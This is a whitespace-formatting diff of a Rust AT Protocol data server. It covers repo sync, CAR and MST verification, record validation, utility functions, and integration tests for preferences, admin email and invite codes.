151 + 145 152 #[derive(Debug)] 146 153 pub struct ImportedRecord { 147 154 pub collection: String, ··· 149 156 pub cid: Cid, 150 157 pub blob_refs: Vec<BlobRef>, 151 158 } 159 + 152 160 pub fn walk_mst( 153 161 blocks: &HashMap<Cid, Bytes>, 154 162 root_cid: &Cid, ··· 219 227 } 220 228 Ok(records) 221 229 } 230 + 222 231 pub struct CommitInfo { 223 232 pub rev: Option<String>, 224 233 pub prev: Option<String>, 225 234 } 235 + 226 236 fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> { 227 237 let obj = match commit { 228 238 Ipld::Map(m) => m, ··· 250 260 }); 251 261 Ok((data_cid, CommitInfo { rev, prev })) 252 262 } 263 + 253 264 pub async fn apply_import( 254 265 db: &PgPool, 255 266 user_id: Uuid, ··· 344 355 ); 345 356 Ok(records) 346 357 } 358 + 347 359 #[cfg(test)] 348 360 mod tests { 349 361 use super::*; 362 + 350 363 #[test] 351 364 fn test_find_blob_refs() { 352 365 let record = serde_json::json!({ ··· 377 390 ); 378 391 assert_eq!(blob_refs[0].mime_type, Some("image/jpeg".to_string())); 379 392 } 393 + 380 394 #[test] 381 395 fn test_find_blob_refs_no_blobs() { 382 396 let record = serde_json::json!({ ··· 386 400 let blob_refs = find_blob_refs(&record, 0); 387 401 assert!(blob_refs.is_empty()); 388 402 } 403 + 389 404 #[test] 390 405 fn test_find_blob_refs_depth_limit() { 391 406 fn deeply_nested(depth: usize) -> JsonValue {
+3
src/sync/listener.rs
··· 3 3 use sqlx::postgres::PgListener; 4 4 use std::sync::atomic::{AtomicI64, Ordering}; 5 5 use tracing::{debug, error, info, warn}; 6 + 6 7 static LAST_BROADCAST_SEQ: AtomicI64 = AtomicI64::new(0); 8 + 7 9 pub async fn start_sequencer_listener(state: AppState) { 8 10 let initial_seq = sqlx::query_scalar!("SELECT COALESCE(MAX(seq), 0) as max FROM repo_seq") 9 11 .fetch_one(&state.db) ··· 22 24 } 23 25 }); 24 26 } 27 + 25 28 async fn listen_loop(state: AppState) -> anyhow::Result<()> { 26 29 let mut listener = PgListener::connect_with(&state.db).await?; 27 30 listener.listen("repo_updates").await?;
+1
src/sync/mod.rs
··· 11 11 pub mod subscribe_repos; 12 12 pub mod util; 13 13 pub mod verify; 14 + 14 15 pub use blob::{get_blob, list_blobs}; 15 16 pub use commit::{get_latest_commit, get_repo_status, list_repos}; 16 17 pub use crawl::{notify_of_update, request_crawl};
+9
src/sync/repo.rs
··· 14 14 use std::io::Write; 15 15 use std::str::FromStr; 16 16 use tracing::error; 17 + 17 18 const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000; 19 + 18 20 #[derive(Deserialize)] 19 21 pub struct GetBlocksQuery { 20 22 pub did: String, 21 23 pub cids: String, 22 24 } 25 + 23 26 pub async fn get_blocks( 24 27 State(state): State<AppState>, 25 28 Query(query): Query<GetBlocksQuery>, ··· 81 84 ) 82 85 .into_response() 83 86 } 87 + 84 88 #[derive(Deserialize)] 85 89 pub struct GetRepoQuery { 86 90 pub did: String, 87 91 pub since: Option<String>, 88 92 } 93 + 89 94 pub async fn get_repo( 90 95 State(state): State<AppState>, 91 96 Query(query): Query<GetRepoQuery>, ··· 177 182 ) 178 183 .into_response() 179 184 } 185 + 180 186 fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) { 181 187 match value { 182 188 Ipld::Link(cid) => { ··· 195 201 _ => {} 196 202 } 197 203 } 204 + 198 205 #[derive(Deserialize)] 199 206 pub struct GetRecordQuery { 200 207 pub did: String, 201 208 pub collection: String, 202 209 pub rkey: String, 203 210 } 211 + 204 212 pub async fn get_record( 205 213 State(state): State<AppState>, 206 214 Query(query): Query<GetRecordQuery>, ··· 209 217 use jacquard_repo::mst::Mst; 210 218 use std::collections::BTreeMap; 211 219 use std::sync::Arc; 220 + 212 221 let repo_row = sqlx::query!( 213 222 r#" 214 223 SELECT r.repo_root_cid
+8
src/sync/subscribe_repos.rs
··· 10 10 use std::sync::atomic::{AtomicUsize, Ordering}; 11 11 use tokio::sync::broadcast::error::RecvError; 12 12 use tracing::{error, info, warn}; 13 + 13 14 const BACKFILL_BATCH_SIZE: i64 = 1000; 15 + 14 16 static SUBSCRIBER_COUNT: AtomicUsize = AtomicUsize::new(0); 17 + 15 18 #[derive(Deserialize)] 16 19 pub struct SubscribeReposParams { 17 20 pub cursor: Option<i64>, 18 21 } 22 + 19 23 #[axum::debug_handler] 20 24 pub async fn subscribe_repos( 21 25 ws: WebSocketUpgrade, ··· 24 28 ) -> Response { 25 29 ws.on_upgrade(move |socket| handle_socket(socket, state, params)) 26 30 } 31 + 27 32 async fn send_event( 28 33 socket: &mut WebSocket, 29 34 state: &AppState, ··· 33 38 socket.send(Message::Binary(bytes.into())).await?; 34 39 Ok(()) 35 40 } 41 + 36 42 pub fn get_subscriber_count() -> usize { 37 43 SUBSCRIBER_COUNT.load(Ordering::SeqCst) 38 44 } 45 + 39 46 async fn handle_socket(mut socket: WebSocket, state: AppState, params: SubscribeReposParams) { 40 47 let count = SUBSCRIBER_COUNT.fetch_add(1, Ordering::SeqCst) + 1; 41 48 crate::metrics::set_firehose_subscribers(count); ··· 45 52 crate::metrics::set_firehose_subscribers(count); 46 53 info!(subscribers = count, "Firehose subscriber disconnected"); 47 54 } 55 + 48 56 async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> { 49 57 if let Some(cursor) = params.cursor { 50 58 let mut current_cursor = cursor;
+10
src/sync/util.rs
··· 10 10 use std::io::Cursor; 11 11 use std::str::FromStr; 12 12 use tokio::io::AsyncWriteExt; 13 + 13 14 fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> { 14 15 Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string()) 15 16 } 17 + 16 18 async fn write_car_blocks( 17 19 commit_cid: Cid, 18 20 commit_bytes: Option<Bytes>, ··· 37 39 .map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?; 38 40 Ok(buffer.into_inner()) 39 41 } 42 + 40 43 fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String { 41 44 dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string() 42 45 } 46 + 43 47 fn format_identity_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> { 44 48 let frame = IdentityFrame { 45 49 did: event.did.clone(), ··· 56 60 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 57 61 Ok(bytes) 58 62 } 63 + 59 64 fn format_account_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> { 60 65 let frame = AccountFrame { 61 66 did: event.did.clone(), ··· 73 78 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 74 79 Ok(bytes) 75 80 } 81 + 76 82 async fn format_sync_event( 77 83 state: &AppState, 78 84 event: &SequencedEvent, ··· 101 107 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 102 108 Ok(bytes) 103 109 } 110 + 104 111 pub async fn format_event_for_sending( 105 112 state: &AppState, 106 113 event: SequencedEvent, ··· 168 175 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 169 176 Ok(bytes) 170 177 } 178 + 171 179 pub async fn prefetch_blocks_for_events( 172 180 state: &AppState, 173 181 events: &[SequencedEvent], ··· 206 214 } 207 215 Ok(blocks_map) 208 216 } 217 + 209 218 fn format_sync_event_with_prefetched( 210 219 event: &SequencedEvent, 211 220 prefetched: &HashMap<Cid, Bytes>, ··· 236 245 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 237 246 Ok(bytes) 238 247 } 248 + 239 249 pub async fn format_event_with_prefetched_blocks( 240 250 event: SequencedEvent, 241 251 prefetched: &HashMap<Cid, Bytes>,
+13
src/sync/verify.rs
··· 8 8 use std::collections::HashMap; 9 9 use thiserror::Error; 10 10 use tracing::{debug, warn}; 11 + 11 12 #[derive(Error, Debug)] 12 13 pub enum VerifyError { 13 14 #[error("Invalid commit: {0}")] ··· 30 31 #[error("Invalid CBOR: {0}")] 31 32 InvalidCbor(String), 32 33 } 34 + 33 35 pub struct CarVerifier { 34 36 http_client: Client, 35 37 } 38 + 36 39 impl Default for CarVerifier { 37 40 fn default() -> Self { 38 41 Self::new() 39 42 } 40 43 } 44 + 41 45 impl CarVerifier { 42 46 pub fn new() -> Self { 43 47 Self { ··· 47 51 .unwrap_or_default(), 48 52 } 49 53 } 54 + 50 55 pub async fn verify_car( 51 56 &self, 52 57 expected_did: &str, ··· 80 85 prev: commit.prev().cloned(), 81 86 }) 82 87 } 88 + 83 89 async fn resolve_did_signing_key(&self, did: &str) -> Result<PublicKey<'static>, VerifyError> { 84 90 let did_doc = self.resolve_did_document(did).await?; 85 91 did_doc ··· 87 93 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))? 88 94 .ok_or(VerifyError::NoSigningKey) 89 95 } 96 + 90 97 async fn resolve_did_document(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 91 98 if did.starts_with("did:plc:") { 92 99 self.resolve_plc_did(did).await ··· 99 106 ))) 100 107 } 101 108 } 109 + 102 110 async fn resolve_plc_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 103 111 let plc_url = std::env::var("PLC_DIRECTORY_URL") 104 112 .unwrap_or_else(|_| "https://plc.directory".to_string()); ··· 123 131 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?; 124 132 Ok(doc.into_static()) 125 133 } 134 + 126 135 async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 127 136 let domain = did 128 137 .strip_prefix("did:web:") ··· 154 163 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?; 155 164 Ok(doc.into_static()) 156 165 } 166 + 157 167 fn verify_mst_structure( 158 168 &self, 159 169 data_cid: &Cid, 160 170 blocks: &HashMap<Cid, Bytes>, 161 171 ) -> Result<(), VerifyError> { 162 172 use ipld_core::ipld::Ipld; 173 + 163 174 let mut stack = vec![*data_cid]; 164 175 let mut visited = std::collections::HashSet::new(); 165 176 let mut node_count = 0; ··· 246 257 Ok(()) 247 258 } 248 259 } 260 + 249 261 #[derive(Debug, Clone)] 250 262 pub struct VerifiedCar { 251 263 pub did: String, ··· 253 265 pub data_cid: Cid, 254 266 pub prev: Option<Cid>, 255 267 } 268 + 256 269 #[cfg(test)] 257 270 #[path = "verify_tests.rs"] 258 271 mod tests;
+22
src/sync/verify_tests.rs
··· 5 5 use cid::Cid; 6 6 use sha2::{Digest, Sha256}; 7 7 use std::collections::HashMap; 8 + 8 9 fn make_cid(data: &[u8]) -> Cid { 9 10 let mut hasher = Sha256::new(); 10 11 hasher.update(data); ··· 12 13 let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap(); 13 14 Cid::new_v1(0x71, multihash) 14 15 } 16 + 15 17 #[test] 16 18 fn test_verifier_creation() { 17 19 let _verifier = CarVerifier::new(); 18 20 } 21 + 19 22 #[test] 20 23 fn test_verify_error_display() { 21 24 let err = VerifyError::DidMismatch { ··· 31 34 let err = VerifyError::MstValidationFailed("test error".to_string()); 32 35 assert!(err.to_string().contains("test error")); 33 36 } 37 + 34 38 #[test] 35 39 fn test_mst_validation_missing_root_block() { 36 40 let verifier = CarVerifier::new(); ··· 41 45 let err = result.unwrap_err(); 42 46 assert!(matches!(err, VerifyError::BlockNotFound(_))); 43 47 } 48 + 44 49 #[test] 45 50 fn test_mst_validation_invalid_cbor() { 46 51 let verifier = CarVerifier::new(); ··· 53 58 let err = result.unwrap_err(); 54 59 assert!(matches!(err, VerifyError::InvalidCbor(_))); 55 60 } 61 + 56 62 #[test] 57 63 fn test_mst_validation_empty_node() { 58 64 let verifier = CarVerifier::new(); ··· 65 71 let result = verifier.verify_mst_structure(&cid, &blocks); 66 72 assert!(result.is_ok()); 67 73 } 74 + 68 75 #[test] 69 76 fn test_mst_validation_missing_left_pointer() { 70 77 use ipld_core::ipld::Ipld; 78 + 71 79 let verifier = CarVerifier::new(); 72 80 let missing_left_cid = make_cid(b"missing left"); 73 81 let node = Ipld::Map(std::collections::BTreeMap::from([ ··· 84 92 assert!(matches!(err, VerifyError::BlockNotFound(_))); 85 93 assert!(err.to_string().contains("left pointer")); 86 94 } 95 + 87 96 #[test] 88 97 fn test_mst_validation_missing_subtree() { 89 98 use ipld_core::ipld::Ipld; 99 + 90 100 let verifier = CarVerifier::new(); 91 101 let missing_subtree_cid = make_cid(b"missing subtree"); 92 102 let record_cid = make_cid(b"record"); ··· 109 119 assert!(matches!(err, VerifyError::BlockNotFound(_))); 110 120 assert!(err.to_string().contains("subtree")); 111 121 } 122 + 112 123 #[test] 113 124 fn test_mst_validation_unsorted_keys() { 114 125 use ipld_core::ipld::Ipld; 126 + 115 127 let verifier = CarVerifier::new(); 116 128 let record_cid = make_cid(b"record"); 117 129 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ ··· 137 149 assert!(matches!(err, VerifyError::MstValidationFailed(_))); 138 150 assert!(err.to_string().contains("sorted")); 139 151 } 152 + 140 153 #[test] 141 154 fn test_mst_validation_sorted_keys_ok() { 142 155 use ipld_core::ipld::Ipld; 156 + 143 157 let verifier = CarVerifier::new(); 144 158 let record_cid = make_cid(b"record"); 145 159 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ ··· 167 181 let result = verifier.verify_mst_structure(&cid, &blocks); 168 182 assert!(result.is_ok()); 169 183 } 184 + 170 185 #[test] 171 186 fn test_mst_validation_with_valid_left_pointer() { 172 187 use ipld_core::ipld::Ipld; 188 + 173 189 let verifier = CarVerifier::new(); 174 190 let left_node = Ipld::Map(std::collections::BTreeMap::from([ 175 191 ("e".to_string(), Ipld::List(vec![])), ··· 188 204 let result = verifier.verify_mst_structure(&root_cid, &blocks); 189 205 assert!(result.is_ok()); 190 206 } 207 + 191 208 #[test] 192 209 fn test_mst_validation_cycle_detection() { 193 210 let verifier = CarVerifier::new(); ··· 200 217 let result = verifier.verify_mst_structure(&cid, &blocks); 201 218 assert!(result.is_ok()); 202 219 } 220 + 203 221 #[tokio::test] 204 222 async fn test_unsupported_did_method() { 205 223 let verifier = CarVerifier::new(); ··· 209 227 assert!(matches!(err, VerifyError::DidResolutionFailed(_))); 210 228 assert!(err.to_string().contains("Unsupported")); 211 229 } 230 + 212 231 #[test] 213 232 fn test_mst_validation_with_prefix_compression() { 214 233 use ipld_core::ipld::Ipld; 234 + 215 235 let verifier = CarVerifier::new(); 216 236 let record_cid = make_cid(b"record"); 217 237 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ ··· 239 259 let result = verifier.verify_mst_structure(&cid, &blocks); 240 260 assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly"); 241 261 } 262 + 242 263 #[test] 243 264 fn test_mst_validation_prefix_compression_unsorted() { 244 265 use ipld_core::ipld::Ipld; 266 + 245 267 let verifier = CarVerifier::new(); 246 268 let record_cid = make_cid(b"record"); 247 269 let entry1 = Ipld::Map(std::collections::BTreeMap::from([
+16
src/util.rs
··· 1 1 use rand::Rng; 2 2 use sqlx::PgPool; 3 3 use uuid::Uuid; 4 + 4 5 const BASE32_ALPHABET: &str = "abcdefghijklmnopqrstuvwxyz234567"; 6 + 5 7 pub fn generate_token_code() -> String { 6 8 generate_token_code_parts(2, 5) 7 9 } 10 + 8 11 pub fn generate_token_code_parts(parts: usize, part_len: usize) -> String { 9 12 let mut rng = rand::thread_rng(); 10 13 let chars: Vec<char> = BASE32_ALPHABET.chars().collect(); 14 + 11 15 (0..parts) 12 16 .map(|_| { 13 17 (0..part_len) ··· 17 21 .collect::<Vec<_>>() 18 22 .join("-") 19 23 } 24 + 20 25 #[derive(Debug)] 21 26 pub enum DbLookupError { 22 27 NotFound, 23 28 DatabaseError(sqlx::Error), 24 29 } 30 + 25 31 impl From<sqlx::Error> for DbLookupError { 26 32 fn from(e: sqlx::Error) -> Self { 27 33 DbLookupError::DatabaseError(e) 28 34 } 29 35 } 36 + 30 37 pub async fn get_user_id_by_did(db: &PgPool, did: &str) -> Result<Uuid, DbLookupError> { 31 38 sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 32 39 .fetch_optional(db) 33 40 .await? 34 41 .ok_or(DbLookupError::NotFound) 35 42 } 43 + 36 44 pub struct UserInfo { 37 45 pub id: Uuid, 38 46 pub did: String, 39 47 pub handle: String, 40 48 } 49 + 41 50 pub async fn get_user_by_did(db: &PgPool, did: &str) -> Result<UserInfo, DbLookupError> { 42 51 sqlx::query_as!( 43 52 UserInfo, ··· 48 57 .await? 49 58 .ok_or(DbLookupError::NotFound) 50 59 } 60 + 51 61 pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> { 52 62 sqlx::query_as!( 53 63 UserInfo, ··· 58 68 .await? 59 69 .ok_or(DbLookupError::NotFound) 60 70 } 71 + 61 72 #[cfg(test)] 62 73 mod tests { 63 74 use super::*; 75 + 64 76 #[test] 65 77 fn test_generate_token_code() { 66 78 let code = generate_token_code(); 67 79 assert_eq!(code.len(), 11); 68 80 assert!(code.contains('-')); 81 + 69 82 let parts: Vec<&str> = code.split('-').collect(); 70 83 assert_eq!(parts.len(), 2); 71 84 assert_eq!(parts[0].len(), 5); 72 85 assert_eq!(parts[1].len(), 5); 86 + 73 87 for c in code.chars() { 74 88 if c != '-' { 75 89 assert!(BASE32_ALPHABET.contains(c)); 76 90 } 77 91 } 78 92 } 93 + 79 94 #[test] 80 95 fn test_generate_token_code_parts() { 81 96 let code = generate_token_code_parts(3, 4); 82 97 let parts: Vec<&str> = code.split('-').collect(); 83 98 assert_eq!(parts.len(), 3); 99 + 84 100 for part in parts { 85 101 assert_eq!(part.len(), 4); 86 102 }
+30
src/validation/mod.rs
··· 1 1 use serde_json::Value; 2 2 use thiserror::Error; 3 + 3 4 #[derive(Debug, Error)] 4 5 pub enum ValidationError { 5 6 #[error("No $type provided")] ··· 17 18 #[error("Unknown record type: {0}")] 18 19 UnknownType(String), 19 20 } 21 + 20 22 #[derive(Debug, Clone, Copy, PartialEq, Eq)] 21 23 pub enum ValidationStatus { 22 24 Valid, 23 25 Unknown, 24 26 Invalid, 25 27 } 28 + 26 29 pub struct RecordValidator { 27 30 require_lexicon: bool, 28 31 } 32 + 29 33 impl Default for RecordValidator { 30 34 fn default() -> Self { 31 35 Self::new() 32 36 } 33 37 } 38 + 34 39 impl RecordValidator { 35 40 pub fn new() -> Self { 36 41 Self { 37 42 require_lexicon: false, 38 43 } 39 44 } 45 + 40 46 pub fn require_lexicon(mut self, require: bool) -> Self { 41 47 self.require_lexicon = require; 42 48 self 43 49 } 50 + 44 51 pub fn validate( 45 52 &self, 46 53 record: &Value, ··· 83 90 } 84 91 Ok(ValidationStatus::Valid) 85 92 } 93 + 86 94 fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 87 95 if !obj.contains_key("text") { 88 96 return Err(ValidationError::MissingField("text".to_string())); ··· 127 135 } 128 136 Ok(()) 129 137 } 138 + 130 139 fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 131 140 if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) { 132 141 let grapheme_count = display_name.chars().count(); ··· 148 157 } 149 158 Ok(()) 150 159 } 160 + 151 161 fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 152 162 if !obj.contains_key("subject") { 153 163 return Err(ValidationError::MissingField("subject".to_string())); ··· 158 168 self.validate_strong_ref(obj.get("subject"), "subject")?; 159 169 Ok(()) 160 170 } 171 + 161 172 fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 162 173 if !obj.contains_key("subject") { 163 174 return Err(ValidationError::MissingField("subject".to_string())); ··· 168 179 self.validate_strong_ref(obj.get("subject"), "subject")?; 169 180 Ok(()) 170 181 } 182 + 171 183 fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 172 184 if !obj.contains_key("subject") { 173 185 return Err(ValidationError::MissingField("subject".to_string())); ··· 185 197 } 186 198 Ok(()) 187 199 } 200 + 188 201 fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 189 202 if !obj.contains_key("subject") { 190 203 return Err(ValidationError::MissingField("subject".to_string())); ··· 202 215 } 203 216 Ok(()) 204 217 } 218 + 205 219 fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 206 220 if !obj.contains_key("name") { 207 221 return Err(ValidationError::MissingField("name".to_string())); ··· 222 236 } 223 237 Ok(()) 224 238 } 239 + 225 240 fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 226 241 if !obj.contains_key("subject") { 227 242 return Err(ValidationError::MissingField("subject".to_string())); ··· 234 249 } 235 250 Ok(()) 236 251 } 252 + 237 253 fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 238 254 if !obj.contains_key("did") { 239 255 return Err(ValidationError::MissingField("did".to_string())); ··· 254 270 } 255 271 Ok(()) 256 272 } 273 + 257 274 fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 258 275 if !obj.contains_key("post") { 259 276 return Err(ValidationError::MissingField("post".to_string())); ··· 263 280 } 264 281 Ok(()) 265 282 } 283 + 266 284 fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> { 267 285 if !obj.contains_key("policies") { 268 286 return Err(ValidationError::MissingField("policies".to_string())); ··· 272 290 } 273 291 Ok(()) 274 292 } 293 + 275 294 fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> { 276 295 let obj = value 277 296 .and_then(|v| v.as_object()) ··· 296 315 Ok(()) 297 316 } 298 317 } 318 + 299 319 fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> { 300 320 if chrono::DateTime::parse_from_rfc3339(value).is_err() { 301 321 return Err(ValidationError::InvalidDatetime { ··· 304 324 } 305 325 Ok(()) 306 326 } 327 + 307 328 pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> { 308 329 if rkey.is_empty() { 309 330 return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string())); ··· 324 345 } 325 346 Ok(()) 326 347 } 348 + 327 349 pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> { 328 350 if collection.is_empty() { 329 351 return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string())); ··· 348 370 } 349 371 Ok(()) 350 372 } 373 + 351 374 #[cfg(test)] 352 375 mod tests { 353 376 use super::*; 354 377 use serde_json::json; 378 + 355 379 #[test] 356 380 fn test_validate_post() { 357 381 let validator = RecordValidator::new(); ··· 365 389 ValidationStatus::Valid 366 390 ); 367 391 } 392 + 368 393 #[test] 369 394 fn test_validate_post_missing_text() { 370 395 let validator = RecordValidator::new(); ··· 374 399 }); 375 400 assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err()); 376 401 } 402 + 377 403 #[test] 378 404 fn test_validate_type_mismatch() { 379 405 let validator = RecordValidator::new(); ··· 385 411 let result = validator.validate(&record, "app.bsky.feed.post"); 386 412 assert!(matches!(result, Err(ValidationError::TypeMismatch { .. }))); 387 413 } 414 + 388 415 #[test] 389 416 fn test_validate_unknown_type() { 390 417 let validator = RecordValidator::new(); ··· 397 424 ValidationStatus::Unknown 398 425 ); 399 426 } 427 + 400 428 #[test] 401 429 fn test_validate_unknown_type_strict() { 402 430 let validator = RecordValidator::new().require_lexicon(true); ··· 407 435 let result = validator.validate(&record, "com.example.custom"); 408 436 assert!(matches!(result, Err(ValidationError::UnknownType(_)))); 409 437 } 438 + 410 439 #[test] 411 440 fn test_validate_record_key() { 412 441 assert!(validate_record_key("valid-key_123").is_ok()); ··· 416 445 assert!(validate_record_key("").is_err()); 417 446 assert!(validate_record_key("invalid/key").is_err()); 418 447 } 448 + 419 449 #[test] 420 450 fn test_validate_collection_nsid() { 421 451 assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
+11
tests/actor.rs
··· 1 1 mod common; 2 2 use common::{base_url, client, create_account_and_login}; 3 3 use serde_json::{json, Value}; 4 + 4 5 #[tokio::test] 5 6 async fn test_get_preferences_empty() { 6 7 let client = client(); ··· 17 18 assert!(body.get("preferences").is_some()); 18 19 assert!(body["preferences"].as_array().unwrap().is_empty()); 19 20 } 21 + 20 22 #[tokio::test] 21 23 async fn test_get_preferences_no_auth() { 22 24 let client = client(); ··· 28 30 .unwrap(); 29 31 assert_eq!(resp.status(), 401); 30 32 } 33 + 31 34 #[tokio::test] 32 35 async fn test_put_preferences_success() { 33 36 let client = client(); ··· 70 73 assert!(adult_pref.is_some()); 71 74 assert_eq!(adult_pref.unwrap()["enabled"], true); 72 75 } 76 + 73 77 #[tokio::test] 74 78 async fn test_put_preferences_no_auth() { 75 79 let client = client(); ··· 85 89 .unwrap(); 86 90 assert_eq!(resp.status(), 401); 87 91 } 92 + 88 93 #[tokio::test] 89 94 async fn test_put_preferences_missing_type() { 90 95 let client = client(); ··· 108 113 let body: Value = resp.json().await.unwrap(); 109 114 assert_eq!(body["error"], "InvalidRequest"); 110 115 } 116 + 111 117 #[tokio::test] 112 118 async fn test_put_preferences_invalid_namespace() { 113 119 let client = client(); ··· 132 138 let body: Value = resp.json().await.unwrap(); 133 139 assert_eq!(body["error"], "InvalidRequest"); 134 140 } 141 + 135 142 #[tokio::test] 136 143 async fn test_put_preferences_read_only_rejected() { 137 144 let client = client(); ··· 156 163 let body: Value = resp.json().await.unwrap(); 157 164 assert_eq!(body["error"], "InvalidRequest"); 158 165 } 166 + 159 167 #[tokio::test] 160 168 async fn test_put_preferences_replaces_all() { 161 169 let client = client(); ··· 208 216 assert_eq!(prefs_arr.len(), 1); 209 217 assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#threadViewPref"); 210 218 } 219 + 211 220 #[tokio::test] 212 221 async fn test_put_preferences_saved_feeds() { 213 222 let client = client(); ··· 249 258 assert_eq!(saved_feeds["$type"], "app.bsky.actor.defs#savedFeedsPrefV2"); 250 259 assert!(saved_feeds["items"].as_array().unwrap().len() == 1); 251 260 } 261 + 252 262 #[tokio::test] 253 263 async fn test_put_preferences_muted_words() { 254 264 let client = client(); ··· 286 296 let prefs_arr = body["preferences"].as_array().unwrap(); 287 297 assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#mutedWordsPref"); 288 298 } 299 + 289 300 #[tokio::test] 290 301 async fn test_preferences_isolation_between_users() { 291 302 let client = client();
+8
tests/admin_email.rs
··· 1 1 mod common; 2 + 2 3 use reqwest::StatusCode; 3 4 use serde_json::{json, Value}; 4 5 use sqlx::PgPool; 6 + 5 7 async fn get_pool() -> PgPool { 6 8 let conn_str = common::get_db_connection_string().await; 7 9 sqlx::postgres::PgPoolOptions::new() ··· 10 12 .await 11 13 .expect("Failed to connect to test database") 12 14 } 15 + 13 16 #[tokio::test] 14 17 async fn test_send_email_success() { 15 18 let client = common::client(); ··· 45 48 assert_eq!(notification.subject.as_deref(), Some("Test Admin Email")); 46 49 assert!(notification.body.contains("Hello, this is a test email from the admin.")); 47 50 } 51 + 48 52 #[tokio::test] 49 53 async fn test_send_email_default_subject() { 50 54 let client = common::client(); ··· 79 83 assert!(notification.subject.is_some()); 80 84 assert!(notification.subject.unwrap().contains("Message from")); 81 85 } 86 + 82 87 #[tokio::test] 83 88 async fn test_send_email_recipient_not_found() { 84 89 let client = common::client(); ··· 99 104 let body: Value = res.json().await.expect("Invalid JSON"); 100 105 assert_eq!(body["error"], "AccountNotFound"); 101 106 } 107 + 102 108 #[tokio::test] 103 109 async fn test_send_email_missing_content() { 104 110 let client = common::client(); ··· 119 125 let body: Value = res.json().await.expect("Invalid JSON"); 120 126 assert_eq!(body["error"], "InvalidRequest"); 121 127 } 128 + 122 129 #[tokio::test] 123 130 async fn test_send_email_missing_recipient() { 124 131 let client = common::client(); ··· 139 146 let body: Value = res.json().await.expect("Invalid JSON"); 140 147 assert_eq!(body["error"], "InvalidRequest"); 141 148 } 149 + 142 150 #[tokio::test] 143 151 async fn test_send_email_requires_auth() { 144 152 let client = common::client();
+12
tests/admin_invite.rs
··· 1 1 mod common; 2 + 2 3 use common::*; 3 4 use reqwest::StatusCode; 4 5 use serde_json::{Value, json}; 6 + 5 7 #[tokio::test] 6 8 async fn test_admin_get_invite_codes_success() { 7 9 let client = client(); ··· 32 34 let body: Value = res.json().await.expect("Response was not valid JSON"); 33 35 assert!(body["codes"].is_array()); 34 36 } 37 + 35 38 #[tokio::test] 36 39 async fn test_admin_get_invite_codes_with_limit() { 37 40 let client = client(); ··· 65 68 let codes = body["codes"].as_array().unwrap(); 66 69 assert!(codes.len() <= 2); 67 70 } 71 + 68 72 #[tokio::test] 69 73 async fn test_admin_get_invite_codes_no_auth() { 70 74 let client = client(); ··· 78 82 .expect("Failed to send request"); 79 83 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 80 84 } 85 + 81 86 #[tokio::test] 82 87 async fn test_disable_account_invites_success() { 83 88 let client = client(); ··· 113 118 let body: Value = res.json().await.expect("Response was not valid JSON"); 114 119 assert_eq!(body["error"], "InvitesDisabled"); 115 120 } 121 + 116 122 #[tokio::test] 117 123 async fn test_enable_account_invites_success() { 118 124 let client = client(); ··· 158 164 .expect("Failed to send request"); 159 165 assert_eq!(res.status(), StatusCode::OK); 160 166 } 167 + 161 168 #[tokio::test] 162 169 async fn test_disable_account_invites_no_auth() { 163 170 let client = client(); ··· 175 182 .expect("Failed to send request"); 176 183 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 177 184 } 185 